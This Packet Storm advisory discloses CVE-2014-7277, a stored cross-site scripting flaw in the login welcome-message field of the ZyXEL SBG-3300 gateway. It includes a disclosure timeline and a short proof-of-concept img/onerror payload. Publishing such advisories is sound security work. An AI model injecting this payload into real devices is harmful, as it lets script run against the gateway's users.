ZyXEL SBG-3300 Security Gateway Cross Site Scripting

2014-10-03T00:00:00
ID PACKETSTORM:128551
Type packetstorm
Reporter Mirko Casadei
Modified 2014-10-03T00:00:00

Description

                                        
                                            `########################################  
#Vulnerability Title: Stored Server XSS in ZyXEL SBG-3300 Security Gateway  
#Date: 02/10/2014  
#CVE-ID: CVE-2014-7277   
#Product: ZyXEL SBG3300-N series  
#Vendor: www.zyxel.com  
#Affected Firmware: Latest version at the time of disclosure V1.00(AADY.4)C0 and below (tested)  
#Patch: Unpatched  
#Authored by: Mirko Casadei  
########################################  
  
#Disclosure Timeline:  
13/08/2014 Vendor Contact with Acknowledgment   
13/09/2014 No response from Vendor after first contact  
02/10/2014 Full Disclosure   
  
#Technical details:  
The web interface of the Security Gateway is affected by a Stored Server XSS vulnerability in the main login page.   
Abusing the login 'welcome message' form, an attacker can inject the XSS in HTML code.  
Example of a working code:  
...  
<span class="title_index">Welcome</span><br>  
<li id="loginMessage"><img src=x onerror=alert('XSS') /></li>  
...  
  
#Remediation  
The vulnerable form should sanitize input.  
########################################  
  
`